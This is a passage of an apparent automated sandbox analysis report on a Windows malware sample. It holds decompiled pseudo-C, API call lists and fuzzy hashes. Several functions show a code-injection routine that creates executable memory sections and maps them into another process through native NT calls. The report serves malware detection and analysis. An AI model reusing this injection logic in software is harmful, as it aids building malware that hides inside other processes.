						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L63;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t205;
				_push(0x83);
				L004011F5(_t176, _t231);
				return _t90;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction ID: ba3189e89dbc592d8eefb072767128172b6b3105eb2a85c49d1307986ab5c8dd
Opcode Fuzzy Hash: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction Fuzzy Hash: 9D511B71900249BFEB209F91CC48FAF7BB8FF85B14F10412AFA11BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401523 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00401523(void* __eax, void* __esi, void* __eflags) {
				long _t89;
				long _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				long _t100;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				long _t124;
				PVOID* _t125;
				long _t126;
				intOrPtr _t129;
				long* _t134;
				void* _t176;
				struct _EXCEPTION_RECORD _t177;
				struct _EXCEPTION_RECORD* _t187;
				intOrPtr* _t189;
				HANDLE* _t190;
				HANDLE* _t191;
				void* _t204;
				void* _t205;
				intOrPtr* _t207;

				asm("outsd");
				asm("out 0x70, al");
				if(__eflags > 0) {
					L004011F5(_t176, __eflags);
					_t129 =  *((intOrPtr*)(_t205 + 8));
					_t177 = 0;
					 *(_t205 - 0x34) = 0;
					__eflags = gs;
					if(gs != 0) {
						_t4 = _t205 - 0x34;
						 *_t4 =  *(_t205 - 0x34) + 1;
						__eflags =  *_t4;
					}
					while(1) {
						_t89 =  *((intOrPtr*)(_t129 + 0x48))();
						__eflags = _t89;
						if(_t89 != 0) {
							break;
						}
						 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
					}
					 *(_t205 - 0x5c) = _t89;
					_t187 = _t205 - 0x60;
					 *_t187 = _t177;
					 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t187);
					_t92 =  *_t187;
					__eflags = _t92;
					if(__eflags != 0) {
						_t134 = _t205 - 0x30;
						 *_t134 = _t92;
						_t134[1] = _t177;
						_t189 = _t205 - 0x28;
						 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
						 *_t189 = 0x18;
						__eflags =  *((intOrPtr*)(_t129 + 0x70))(_t205 - 0x10, 0x40, _t189, _t205 - 0x30);
						if(__eflags == 0) {
							__eflags = NtDuplicateObject( *(_t205 - 0x10), 0xffffffff, 0xffffffff, _t205 - 0xc, _t177, _t177, 2);
							if(__eflags == 0) {
								 *(_t205 - 8) = _t177;
								_t99 = _t205 - 0x50;
								 *(_t99 + 4) = _t177;
								 *_t99 = 0x5000;
								_t190 = _t205 - 0x54;
								_t100 = NtCreateSection(_t190, 6, _t177, _t99, 4, 0x8000000, _t177);
								__eflags = _t100;
								if(_t100 == 0) {
									 *_t26 =  *(_t205 - 0x50);
									_t123 = _t205 - 0x44;
									 *_t123 = _t177;
									_t124 = NtMapViewOfSection( *_t190, 0xffffffff, _t123, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
									__eflags = _t124;
									if(_t124 == 0) {
										_t125 = _t205 - 0x3c;
										 *_t125 = _t177;
										_t126 = NtMapViewOfSection( *_t190,  *(_t205 - 0xc), _t125, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
										__eflags = _t126;
										if(_t126 == 0) {
											_t204 =  *(_t205 - 0x44);
											 *((intOrPtr*)(_t129 + 0x20))(_t177, _t204, 0x104);
											 *((intOrPtr*)(_t204 + 0x208)) =  *((intOrPtr*)(_t205 + 0x14));
											_t38 = _t205 - 8;
											 *_t38 =  *(_t205 - 8) + 1;
											__eflags =  *_t38;
										}
									}
								}
								_t101 = _t205 - 0x50;
								 *(_t101 + 4) = _t177;
								 *_t101 =  *((intOrPtr*)(_t205 + 0x10)) + 0x10000;
								_t191 = _t205 - 0x58;
								_t102 = NtCreateSection(_t191, 0xe, _t177, _t101, 0x40, 0x8000000, _t177);
								__eflags = _t102;
								if (_t102 != 0) goto L60;
								 *_t102 =  *_t102 + _t102;
								__eflags =  *_t102;
							}
						}
					}
					_push(0x15a4);
					_t93 =  *_t207;
					_push(0x83);
					L004011F5(_t177, __eflags);
					return _t93;
				} else {
					asm("popfd");
					asm("repe add al, 0x9b");
					asm("wait");
					asm("wait");
					return __esi;
				}
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction ID: c9dca56e4daa214b2bd9150ebf0f157daf6c833c296841cdcd3f7df5e4c146b1
Opcode Fuzzy Hash: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction Fuzzy Hash: 91510A71900249BFEB209F92CC48F9FBBB8FF85B14F14411AFA11BA2A5D7749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040158C Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040158C(void* __eax, void* __edi) {
				void* _t89;
				intOrPtr _t91;
				struct _EXCEPTION_RECORD _t94;
				intOrPtr _t95;
				struct _GUID _t101;
				struct _GUID _t103;
				long _t104;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t131;
				struct _EXCEPTION_RECORD* _t136;
				void* _t180;
				struct _EXCEPTION_RECORD _t181;
				struct _EXCEPTION_RECORD* _t189;
				intOrPtr* _t191;
				HANDLE* _t192;
				HANDLE* _t193;
				void* _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				intOrPtr _t216;

				_t211 = _t210 + 1;
				asm("clc");
				asm("stc");
				_t89 = _t207;
				_t208 = __eax;
				_t180 = __edi - 1;
				_t2 = _t89 - 0x7d;
				 *_t2 =  *((intOrPtr*)(_t89 - 0x7d));
				_t216 =  *_t2;
				_push(0x83);
				L004011F5(_t180, _t216);
				_t131 =  *((intOrPtr*)(__eax + 8));
				_t181 = 0;
				 *((intOrPtr*)(__eax - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(__eax - 0x34)) =  *((intOrPtr*)(__eax - 0x34)) + 1;
				}
				while(1) {
					_t91 =  *((intOrPtr*)(_t131 + 0x48))();
					if(_t91 != 0) {
						break;
					}
					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t91;
				_t189 = _t208 - 0x60;
				 *_t189 = _t181;
				 *((intOrPtr*)(_t131 + 0x4c))(_t91, _t189);
				_t94 =  *_t189;
				if(_t94 != 0) {
					_t136 = _t208 - 0x30;
					 *_t136 = _t94;
					 *(_t136 + 4) = _t181;
					_t191 = _t208 - 0x28;
					 *((intOrPtr*)(_t131 + 0x10))(_t191, 0x18);
					 *_t191 = 0x18;
					_push(_t208 - 0x30);
					_push(_t191);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t181, _t181, 2) == 0) {
						 *(_t208 - 8) = _t181;
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t181;
						 *_t101 = 0x5000;
						_t192 = _t208 - 0x54;
						if(NtCreateSection(_t192, 6, _t181, _t101, 4, 0x8000000, _t181) == 0) {
							 *_t28 =  *(_t208 - 0x50);
							_t125 = _t208 - 0x44;
							 *_t125 = _t181;
							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
								_t127 = _t208 - 0x3c;
								 *_t127 = _t181;
								if(NtMapViewOfSection( *_t192,  *(_t208 - 0xc), _t127, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
									_t206 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t131 + 0x20))(_t181, _t206, 0x104);
									 *((intOrPtr*)(_t206 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t103 = _t208 - 0x50;
						 *(_t103 + 4) = _t181;
						 *_t103 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t193 = _t208 - 0x58;
						_t104 = NtCreateSection(_t193, 0xe, _t181, _t103, 0x40, 0x8000000, _t181);
						if (_t104 != 0) goto L60;
						 *_t104 =  *_t104 + _t104;
					}
				}
				_push(0x15a4);
				_t95 =  *_t211;
				_push(0x83);
				L004011F5(_t181, _t237);
				return _t95;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction ID: 02d2e3ac3767ea31e924919402f7a0ff100aaf9667a8aefd77e34752db93229b
Opcode Fuzzy Hash: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction Fuzzy Hash: C9513AB1900249BFEB209F92CC48F9FBBB8FF85B14F10415AFA11AA1E5D7749944CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00401585 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401585() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t185;
				intOrPtr* _t187;
				HANDLE* _t188;
				HANDLE* _t189;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				void* _t211;

				_push(0x387);
				_t206 = _t205 + 4;
				_push(0x83);
				L004011F5(_t175, _t211);
				_t126 =  *((intOrPtr*)(_t203 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t86;
				_t185 = _t203 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t185);
				_t89 =  *_t185;
				if(_t89 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t187 = _t203 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t203 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t203 - 8) = _t176;
						_t96 = _t203 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t188 = _t203 - 0x54;
						if(NtCreateSection(_t188, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t120 = _t203 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t120, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t203 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t122, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t98 = _t203 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						_t99 = NtCreateSection(_t189, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L64;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t206;
				_push(0x83);
				L004011F5(_t176, _t232);
				return _t90;
			}

0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction ID: 9d9f292dd7e40d4d2d6115b75542e29ae97a3c703512c5fffb38717ec82669a3
Opcode Fuzzy Hash: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction Fuzzy Hash: 36511A75900249BFEB209F91CC48FAF7BB8FF85B14F10416AFA11BA1A5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040159A Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0040159A() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t209;

				_push(0x83);
				L004011F5(_t175, _t209);
				_t127 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L61;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t204;
				_push(0x83);
				L004011F5(_t176, _t230);
				return _t90;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction ID: 1cd82c906aaffff485458f801d6ba595cb0416390f7e33d4f9d681d8d529f326
Opcode Fuzzy Hash: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction Fuzzy Hash: BF510971900249BFEB209F92CC48F9FBBB8FF85B14F104159FA11AA2A5D6749940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401749 Relevance: 3.0, APIs: 2, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction ID: 088a864a315bec2a81033f27f4cad91d314b4a72151043dcf738e9c9ac7e5ebb
Opcode Fuzzy Hash: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction Fuzzy Hash: 0E011475500288FEEB219F92CC49FAF7FB9EF82B10F08016AF510B61E5E2714980CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0246003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0246024D

Strings

kernel32.dll, xrefs: 0246008F, 02460095
cess, xrefs: 0246018D

Memory Dump Source

Source File: 00000004.00000002.636285582.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2460000_rfuiwjh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 2b418b1f4fbb3f8caec7f1453f7fae8523b3a9d7b3c7f0b4da735560f48d1764
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: F5526974A01229DFDB64CF58C984BADBBB1BF09304F1480DAE94DAB351DB30AA85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA70 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 530
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNELBASE(00000000,022E09D4,?,?,?,?,?,?,00413246,000000FF), ref: 0040EC96
_memset.LIBCMT ref: 0040EE95
LoadLibraryA.KERNELBASE(0043D348,?,?,?,?,?,?,00413246,000000FF), ref: 0040F10D

Strings

L3@, xrefs: 0040EC06

Memory Dump Source

Source File: 00000004.00000002.634136698.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_rfuiwjh.jbxd

Similarity

API ID: AllocLibraryLoadLocal_memset
String ID: L3@
API String ID: 3001991562-74877206
Opcode ID: bd9014d15267a48505b4caba286d1cb78914e6118b25051498a9abb6c9eba890
Instruction ID: 8642481a01df23607ce85ee2231ddc15ad8b2bbf9e6295a8e4f19d84a88c1ac2
Opcode Fuzzy Hash: bd9014d15267a48505b4caba286d1cb78914e6118b25051498a9abb6c9eba890
Instruction Fuzzy Hash: C012D871644344AFE3209FA1DD4AF5B77A8FB88B01F10453EF749BA1E1DBB464408B6A

Uniqueness

Uniqueness Score: -1.00%

Function 02460E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02460223,?,?), ref: 02460E19
SetErrorMode.KERNELBASE(00000000,?,?,02460223,?,?), ref: 02460E1E

Memory Dump Source

Source File: 00000004.00000002.636285582.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2460000_rfuiwjh.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: d274993f23bb047d28e9000c5a5a01e7936a77d8ac1859f318053fb926a2fe75
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 79D0123154512877D7002AD4DC0DBDE7B1CDF05B66F008011FB0DD9180C770954046E6

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6F0 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(022D697C,022E09D4,00000040,?,?,0040F078,?,?,?,?,?,?,00413246,000000FF), ref: 0040E7C0

Memory Dump Source

Source File: 00000004.00000002.634136698.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_rfuiwjh.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a4d45899bb2d75addfdc849062d626ff1d25a05c3e4c2ac9797f45d58bb2ff26
Instruction ID: f01ecb459cbfb3dd0aa0bd1d4d090b7b8208c7bf3b78b88e987380e049611219
Opcode Fuzzy Hash: a4d45899bb2d75addfdc849062d626ff1d25a05c3e4c2ac9797f45d58bb2ff26
Instruction Fuzzy Hash: BB113370D96640CAE314CFE4F9487313BB6EB58700F20A42DD485DB6A4D7BD4594CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401932 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00401932(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				void* _t19;
				void* _t20;

				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, __eflags);
				_t14 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				_t10 = L00401467(_t19, _t20); // executed
